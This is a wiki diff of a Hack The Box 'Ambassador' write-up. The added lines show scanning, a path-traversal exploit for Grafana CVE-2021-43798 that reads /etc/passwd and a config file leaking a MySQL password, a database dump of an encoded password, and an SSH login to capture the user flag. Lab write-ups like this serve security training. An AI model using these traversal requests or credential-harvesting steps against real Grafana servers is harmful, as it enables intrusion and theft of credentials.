Differences

This shows you the differences between two versions of the page.

--- ex:htb:ambassador:start [2022/12/22 10:38] – ebaer
+++ ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer
@@ Line 92: / Line 92: @@
 |   Salt: <,miU\x0F\x07\x073\x03\x0F(:\x15\x10\x08fAJJ
 |_  Auth Plugin Name: caching_sha2_password
-service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+</code>
-SF-Port3000-TCP:V=7.93%I=7%D=12/22%Time=63A4246A%P=x86_64-pc-linux-gnu%r(G
-SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
-SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
-SF:x20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contr
-SF:ol:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpi
-SF:res:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:
-SF:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conte
-SF:nt-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protec
-SF:tion:\x201;\x20mode=block\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2009:3
-SF:3:29\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found
-SF:</a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
-SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
-SF:\x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCa
-SF:che-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPr
-SF:agma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20Http
-SF:Only;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-
-SF:Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20T
-SF:hu,\x2022\x20Dec\x202022\x2009:33:34\x20GMT\r\nContent-Length:\x200\r\n
-SF:\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-
-SF:Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n40
-SF:0\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Re
-SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
-SF:20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/
-SF:1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charse
-SF:t=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSes
-SF:sionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
-SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
-SF:equest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
-SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
-SF:\x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found
-SF:\r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charse
-SF:t=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache
-SF:\r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.tx
-SF:t%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Op
-SF:tions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201
-SF:;\x20mode=block\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2009:34:00\x20GM
-SF:T\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n
-SF:");
-No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
-TCP/IP fingerprint:
-OS:SCAN(V=7.93%E=4%D=12/22%OT=22%CT=1%CU=31938%PV=Y%DS=2%DC=T%G=Y%TM=63A424
-OS:EA%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
-OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
-OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
-OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
-OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
-OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
-OS:F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
-OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
-Network Distance: 2 hops
-Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
-TRACEROUTE (using port 443/tcp)
+===== Website =====
-HOP RTT      ADDRESS
-   41.91 ms 10.10.14.1
-   42.05 ms 10.129.228.56
-OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+{{:ex:htb:ambassador:htb-ambassador-1.jpg?direct&600|}}
-Nmap done: 1 IP address (1 host up) scanned in 137.52 seconds
+==== Gobuster ====
+<code>
+gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://10.129.228.56
+===============================================================
+Gobuster v3.3
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://10.129.228.56
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
+[+] Negative Status codes:   404
+[+] User Agent:              gobuster/3.3
+[+] Timeout:                 10s
+===============================================================
+/12/22 10:41:28 Starting gobuster in directory enumeration mode
+===============================================================
+/.hta                 (Status: 403) [Size: 278]
+/.htaccess            (Status: 403) [Size: 278]
+/.htpasswd            (Status: 403) [Size: 278]
+/categories           (Status: 301) [Size: 319] [--> http://10.129.228.56/categories/]
+/images               (Status: 301) [Size: 315] [--> http://10.129.228.56/images/]
+/index.html           (Status: 200) [Size: 3654]
+/posts                (Status: 301) [Size: 314] [--> http://10.129.228.56/posts/]
+/server-status        (Status: 403) [Size: 278]
+/sitemap.xml          (Status: 200) [Size: 645]
+/tags                 (Status: 301) [Size: 313] [--> http://10.129.228.56/tags/]
+Progress: 4561 / 4615 (98.83%)===============================================================
+/12/22 10:41:49 Finished
+===============================================================
 </code>
+====== Grafana - Port 3000 ======
-===== Website =====
+  * Version 8.2.0 -> CVE-2021-43798
-{{:ex:htb:ambassador:htb-ambassador-1.jpg?direct&600|}}
+<code>
+gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://10.129.228.56:3000 --exclude-length "29"
+===============================================================
+Gobuster v3.3
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://10.129.228.56:3000
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
+[+] Negative Status codes:   404
+[+] Exclude Length:          29
+[+] User Agent:              gobuster/3.3
+[+] Timeout:                 10s
+===============================================================
+/12/22 10:49:23 Starting gobuster in directory enumeration mode
+===============================================================
+/apis                 (Status: 401) [Size: 27]
+/api                  (Status: 401) [Size: 27]
+/login                (Status: 200) [Size: 26724]
+/org                  (Status: 302) [Size: 24] [--> /]
+/public               (Status: 302) [Size: 31] [--> /public/]
+/robots.txt           (Status: 200) [Size: 26]
+/signup               (Status: 200) [Size: 26693]
+Progress: 4509 / 4615 (97.70%)===============================================================
+/12/22 10:49:44 Finished
+===============================================================
+</code>
+<code>
+https://github.com/A-D-Team/grafanaExp
+./grafanaExp_linux_amd64 exp -u "http://10.129.228.56:3000"
+/12/22 11:15:24 Target vulnerable has plugin [alertlist]
+/12/22 11:15:24 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
+/12/22 11:15:24 There is [0] records in db.
+/12/22 11:15:24 type:[mysql]	name:[mysql.yaml]		url:[]	user:[grafana]	password[]	database:[grafana]	basic_auth_user:[]	basic_auth_password:[]
+/12/22 11:15:24 All Done, have nice day!
+</code>
+===== RFI CVE-2021-43798 =====
+<code>
+GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
+Host: 10.129.228.56:3000
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: redirect_to=%2Fpublic%2Fplugins%2Fmysql%2F
+Connection: close
+</code>
+<code>
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+pollinate:x:110:1::/var/cache/pollinate:/bin/false
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+developer:x:1000:1000:developer:/home/developer:/bin/bash
+lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+grafana:x:113:118::/usr/share/grafana:/bin/false
+mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
+consul:x:997:997::/home/consul:/bin/false
+</code>
+<code>
+GET /public/plugins/alertlist/../../../../../../../../var/www/html/index.html
+</code>
+<code>
+/etc/grafana/provisioning/datasources/mysql.yaml
+GET /public/plugins/alertlist/../../../../../../../../etc/grafana/provisioning/datasources/mysql.yaml HTTP/1.1
+HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Cache-Control: no-cache
+Content-Length: 180
+Content-Type: application/x-yaml
+Expires: -1
+Last-Modified: Fri, 02 Sep 2022 00:56:07 GMT
+Pragma: no-cache
+X-Content-Type-Options: nosniff
+X-Frame-Options: deny
+X-Xss-Protection: 1; mode=block
+Date: Thu, 22 Dec 2022 13:26:24 GMT
+Connection: close
+apiVersion: 1
+datasources:
+ - name: mysql.yaml
+   type: mysql
+   host: localhost
+   database: grafana
+   user: grafana
+   password: dontStandSoCloseToMe63221!
+   editable: false
+</code>
+===== msf mysql enum =====
+<code>
+msf6 > use auxiliary/admin/mysql/mysql_enum
+msf6 auxiliary(admin/mysql/mysql_enum) > show info
+       Name: MySQL Enumeration Module
+     Module: auxiliary/admin/mysql/mysql_enum
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+Provided by:
+  Carlos Perez <carlos_perez@darkoperator.com>
+Check supported:
+  No
+Basic options:
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  PASSWORD                   no        The password for the specified username
+  RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+  RPORT     3306             yes       The target port (TCP)
+  USERNAME                   no        The username to authenticate as
+Description:
+  This module allows for simple enumeration of MySQL Database Server
+  provided proper credentials to connect remotely.
+References:
+  https://cisecurity.org/benchmarks.html
+View the full module info with the info -d command.
+msf6 auxiliary(admin/mysql/mysql_enum) > set PASSWORD dontStandSoCloseToMe63221!
+PASSWORD => dontStandSoCloseToMe63221!
+msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 10.129.228.56
+RHOSTS => 10.129.228.56
+msf6 auxiliary(admin/mysql/mysql_enum) > set username grafana
+username => grafana
+msf6 auxiliary(admin/mysql/mysql_enum) > set ConnectTimeout 30
+ConnectTimeout => 30
+msf6 auxiliary(admin/mysql/mysql_enum) > run
+</code>
+-> Timeout (anti metasploit measures?)
+===== MySQL manual =====
+<code>
+show databases;
+use information_schema
+select * from tables;
+| def           | whackywidget       | users                                                | BASE TABLE  | InnoDB             |      10 | Dynamic    |          0 |              0 |       16384 |               0 |            0 |         0 |           NULL | 2022-09-02 00:49:04 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
+| def           | performance_schema | innodb_redo_log_files                                | BASE TABLE  | PERFORMANCE_SCHEMA |      10 | Dynamic    |          1 |              0 |           0 |               0 |            0 |         0 |           NULL | 2022-12-22 09:31:21 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
++---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+
+rows in set (0.325 sec)
+MySQL [information_schema]>  use whackywidget;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+MySQL [whackywidget]> show tables;
++------------------------+
+| Tables_in_whackywidget |
++------------------------+
+| users                  |
++------------------------+
+row in set (0.048 sec)
+MySQL [whackywidget]> select * from users;
++-----------+------------------------------------------+
+| user      | pass                                     |
++-----------+------------------------------------------+
+| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
++-----------+------------------------------------------+
+row in set (0.047 sec)
+</code>
+<code>
+echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
+anEnglishManInNewYork027468
+</code>
+<code>
+sh developer@10.129.228.56
+developer@10.129.228.56's password:
+Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)
+[...]
+Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
+developer@ambassador:~$ cat user.txt
+bdff80ba21c478079a3332f785c4ddba